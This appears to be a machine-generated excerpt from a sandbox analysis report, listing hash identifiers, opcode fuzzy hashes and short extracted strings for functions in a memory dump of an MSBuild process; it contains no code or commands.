                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4d390e0ca4d91da7ea6666f3733c8339ef08d453930df1994e5acaf414c75a25
                                                                                                  • Instruction ID: 450a339007e8e1083d06336aaf9ca7722396e53f65c98a5bf42af5baa1830c0b
                                                                                                  • Opcode Fuzzy Hash: 4d390e0ca4d91da7ea6666f3733c8339ef08d453930df1994e5acaf414c75a25
                                                                                                  • Instruction Fuzzy Hash: E101F570B402214FCB65EABCE850B3E73F5DBCA610F14853AD40ECB346DA24DC064791
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc1c802a1de86791aa158184af9280df05b88395462a9061f600859f80823ec8
                                                                                                  • Instruction ID: aa1b460b21760a3c1c54d97702296a99a67927e6f836b25df9e60e1d6c9faae2
                                                                                                  • Opcode Fuzzy Hash: dc1c802a1de86791aa158184af9280df05b88395462a9061f600859f80823ec8
                                                                                                  • Instruction Fuzzy Hash: 1E01D471B002211FD751D6BDD96076FB7EAFB8A714F144439E10ACB386DA22DC028391
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1459e09664804b8b84ffb369b2b4c5bd47d9f977d535dd1de95ecd35c3b0594a
                                                                                                  • Instruction ID: 891b87054260cc8169ca4093f28f7c88bbb96aaa576cccca9e299ac93b8eed8c
                                                                                                  • Opcode Fuzzy Hash: 1459e09664804b8b84ffb369b2b4c5bd47d9f977d535dd1de95ecd35c3b0594a
                                                                                                  • Instruction Fuzzy Hash: 3311C2B1D012199FCB10CF9AD884ADEFBB4FB49324F10812AE518A7200C375A554CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de25d9c1db2df2e72fab6709a16463c9d46e08ebb0d846438324090f1a4d3164
                                                                                                  • Instruction ID: 3b52f8d590b00ea0659d1e63d142e6f9a347dc8c79601b99f2c7c01e9840433f
                                                                                                  • Opcode Fuzzy Hash: de25d9c1db2df2e72fab6709a16463c9d46e08ebb0d846438324090f1a4d3164
                                                                                                  • Instruction Fuzzy Hash: 3B018171B100211BDB64D9AEE85473FA3DFDBC9614F20883EE50EC7348DA61DC024395
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: edffb9dade4bb1f710f83f196fea16c441f36a12088cc5331ac465116f4a0266
                                                                                                  • Instruction ID: 880634348d3b8737c28408a64a5b1041ac7964680dc79c108faed6d016b096a4
                                                                                                  • Opcode Fuzzy Hash: edffb9dade4bb1f710f83f196fea16c441f36a12088cc5331ac465116f4a0266
                                                                                                  • Instruction Fuzzy Hash: 3311CFB5D012199FCB10CF9AD984ADEFBB4FB48324F10852AE558B7210C379A554CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b59b5ec9ad8eb07afb8eb149f4fafcc11c835e745bf801213fd3c8ae76aebf50
                                                                                                  • Instruction ID: 63659e7d46e868f636c1eb73e694f092b10ddead0af96d550492168edfd299d8
                                                                                                  • Opcode Fuzzy Hash: b59b5ec9ad8eb07afb8eb149f4fafcc11c835e745bf801213fd3c8ae76aebf50
                                                                                                  • Instruction Fuzzy Hash: E701A736B141265BDB54DA79D810BBF73AFABC8710F00463AD50AE7284DE758C438791
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3ab1dcfa6e1befd04fad0fb26acff6f6c2c95157467c7331243ec6ea3564551a
                                                                                                  • Instruction ID: d12945e8d970a94b9f2e8122a46e2297407fddaaae254ba86bc23ae3e90f1aab
                                                                                                  • Opcode Fuzzy Hash: 3ab1dcfa6e1befd04fad0fb26acff6f6c2c95157467c7331243ec6ea3564551a
                                                                                                  • Instruction Fuzzy Hash: 8201AF71B501225BCB6496BDECA0B3F63EADBCAA24F10843AE10EC7344DE29DC424795
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e21ebf8b16f1eed60eabde1d32fe693b6958d08e2c20a13365b28dd5fff29a32
                                                                                                  • Instruction ID: 1ce8c741770894af61f484be9b226520e7d039f52547adc20428beba9922437a
                                                                                                  • Opcode Fuzzy Hash: e21ebf8b16f1eed60eabde1d32fe693b6958d08e2c20a13365b28dd5fff29a32
                                                                                                  • Instruction Fuzzy Hash: 0E018C30B101354FCB60EA7DE950B2EB3EAFB8A614F108838E50EC734ADA21DC4283C1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e7dde83a2151b08b96da75239616e25848d01b14f5b024cf16eafbac2596c48a
                                                                                                  • Instruction ID: 2034a62e9305ceca8957d5cc0c96a63bb8c9852147e8e97d0934e11c8ce74dad
                                                                                                  • Opcode Fuzzy Hash: e7dde83a2151b08b96da75239616e25848d01b14f5b024cf16eafbac2596c48a
                                                                                                  • Instruction Fuzzy Hash: 31012872F202359BCF959A6AE8406AEB379FB84714F108639E901EB344DB31AC05C7C0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 936b96b50f62ec4ee62aac303003cafbaa41e49933247666e22b02423be84c47
                                                                                                  • Instruction ID: dee66a5e3bb8bfd3ce9b0c7d28ce825619cf44010ffafaf8a619b044df64ca5f
                                                                                                  • Opcode Fuzzy Hash: 936b96b50f62ec4ee62aac303003cafbaa41e49933247666e22b02423be84c47
                                                                                                  • Instruction Fuzzy Hash: 7AF08270B052198FC780EFBCD44025E77F2BB85200F10827AC51AC7369EB30C942CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 843692f5016e34a27cff7580c7ad69a6f12e7b6d2019e077104702e2046a804d
                                                                                                  • Instruction ID: 4ac4543b7d2131d19d3eecea53443ac49321c278b91a4fde07cec095b5db2729
                                                                                                  • Opcode Fuzzy Hash: 843692f5016e34a27cff7580c7ad69a6f12e7b6d2019e077104702e2046a804d
                                                                                                  • Instruction Fuzzy Hash: 5CE0D171D14156DFDF90CE70CB657697795D741314F204997D044DB141D277DF018701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2222239885
                                                                                                  • Opcode ID: 61cd5ad72f916962e918d64f3871e153b99f162118075f9821c3897403d631a1
                                                                                                  • Instruction ID: 16a7a140e2ac78c300da62ac951b0c35b7fcc739967e85dc69ea85c68929a4ba
                                                                                                  • Opcode Fuzzy Hash: 61cd5ad72f916962e918d64f3871e153b99f162118075f9821c3897403d631a1
                                                                                                  • Instruction Fuzzy Hash: B0124E70F0022A8FDB68DF75C954AAEB7B6BF85700F208569D4099B354DB30DD86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: 42a8ebe57254e1866f6adbbc28e62f3efa56c0bf8b858c7b63fd9a429c22b02c
                                                                                                  • Instruction ID: b3e0cc12d3b3445774977ce86ae40de9050af79c411924c1ac029714c41879c8
                                                                                                  • Opcode Fuzzy Hash: 42a8ebe57254e1866f6adbbc28e62f3efa56c0bf8b858c7b63fd9a429c22b02c
                                                                                                  • Instruction Fuzzy Hash: A0916E70E1022ADFDB68DF65DA54B7EB7B2BF84700F108629E4019B358DB759C85CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-390881366
                                                                                                  • Opcode ID: 16e9e7611d21331237f068a6e4068e3f503fbac239749a33330a6865c5ffed0f
                                                                                                  • Instruction ID: 5647565682cb4655cf8b86411ee098000d1b752b696c7292f48d6c5f5036f121
                                                                                                  • Opcode Fuzzy Hash: 16e9e7611d21331237f068a6e4068e3f503fbac239749a33330a6865c5ffed0f
                                                                                                  • Instruction Fuzzy Hash: D4F18070B1021ACFDB59EF69C594A6EBBB2FF84304F248529D4159B358DB31EC82CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: f1313acfbd5503e8ba05375d3347f9e94be75ff0f33548ecbb879438d53a5588
                                                                                                  • Instruction ID: 636118d842a169fdf2f2163f4d4b777e5c0abd7cd2fcff2967e3d89533ebda9f
                                                                                                  • Opcode Fuzzy Hash: f1313acfbd5503e8ba05375d3347f9e94be75ff0f33548ecbb879438d53a5588
                                                                                                  • Instruction Fuzzy Hash: 36B17B30B1022A8FDB58DFA9C594A6EB7B2BF84304F248929D4059B359DB35DC86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LR^q$LR^q$$^q$$^q
                                                                                                  • API String ID: 0-2454687669
                                                                                                  • Opcode ID: 2b665532bece6ca5d80714546242c6c98a217264cb963cedf9aa8c4d4ce179ba
                                                                                                  • Instruction ID: 9ec2e5de48d32c22b921b12acdef83079c11a41b6698ad780bc52d189ad913a8
                                                                                                  • Opcode Fuzzy Hash: 2b665532bece6ca5d80714546242c6c98a217264cb963cedf9aa8c4d4ce179ba
                                                                                                  • Instruction Fuzzy Hash: A551E730B102268FDB58DF29D840A6EB7F2FF84304F148669D4059B3A9DB31EC49CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: f29ca6e71b6c3858fc8f0c0fe71055b90e8bbfdf7b40fe75c936cf649dd5acb0
                                                                                                  • Instruction ID: 5e1a0411c9d02df534ef3a0d0410ee6c1adcc65b109c6f977ae82f61b3a33d77
                                                                                                  • Opcode Fuzzy Hash: f29ca6e71b6c3858fc8f0c0fe71055b90e8bbfdf7b40fe75c936cf649dd5acb0
                                                                                                  • Instruction Fuzzy Hash: 5251A170E202269FDF65DB64D580ABEB3B2EB84301F20853AD805DB358DB31DC42CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%